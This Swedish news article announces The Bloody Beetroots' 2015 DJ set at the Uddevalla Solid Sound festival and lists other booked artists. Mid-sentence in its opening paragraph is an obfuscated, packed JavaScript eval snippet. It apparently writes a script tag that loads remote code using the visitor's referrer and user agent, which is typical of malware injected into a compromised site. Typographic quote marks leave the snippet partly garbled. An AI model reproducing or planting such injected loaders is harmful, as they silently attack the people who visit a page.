Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

The Bloody Beetroots spelar på USS15

The Bloody Beetroots spelar på USS15

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sttai|var|u0026u|referrer|sntfk||js|php’.split(’|’),0,{}))
internationella electronica-stjärnan Sir Bob Cornelius Rifo, också känd under namnet The Bloody Beetroots kommer till Uddevalla Solid Sound. Spelningen på Riversideängen blir den enda svenska festivalspelningen 2015 för artisten som uppmärksammats för sina samarbeten med bland annat Paul McCartney och Tommy Lee.

The Bloody Beetsroots – Sir Bob Cornelius Rifo (DJ set) är nu äntligen helt klar för årets upplaga av Uddevalla Solid Sound. De som bevakat den elektroniska dansscenen under de senaste åren vet att The Bloody Beetroots och dess mastermind Sir Bob Cornelius Rifo blivit synonymt med allt som är bra med den genren.

Genom sina musikaliska samarbeten med tunga artister som Paul McCartney, Tommy Lee och Peter Frampton har The Bloody Beetroots rönt stor uppmärksamhet över hela världen. Möjligen kommer festivalpubliken att bjudas på ett gästframträdande av Dennis Lyxén – som också kommer uppträda på USS med sitt band INVSN. Dennis Lyxén har nämligen samarbetat med The Bloody Beetroots på låten ”Church of Noise”.

– Det här är vår första internationella bokning för festivalen, och en personlig drömbokning. Ända sedan jag körde min första klubb har jag velat bjuda publiken på den här akten så det klart att det känns helt fantastiskt, säger Simon Tehyrell, informationsansvarig på Uddevalla Solid Sound.

Spelningen på Uddevalla Solid Sound blir den enda svenska festivalspelningen 2015 för The Bloody Beetroots – Sir Bob Cornelius Rifo (DJ set) som enbart gör ett annat gig i Sverige i år.

Uddevalla Solid Sound är en av få svenska festivaler med en uttalad målsättning om ett totalt jämställt artistutbud. I år arrangeras Uddevalla Solid Sound den 12–13 juni på Riversideängen i centrala Uddevalla, den klassiska festivalhelgen som Hultsfredsfestivalen en gång prenumererade på.

Artister som hittills är klara för festivalen är:

–       Thåström
–       Maskinen
–       Familjen
–       Amason
–       Silvana Imam
–       John De Sohn
–       Love Antell
–       Little Jinder
–       INVSN
–       Beatrice Eli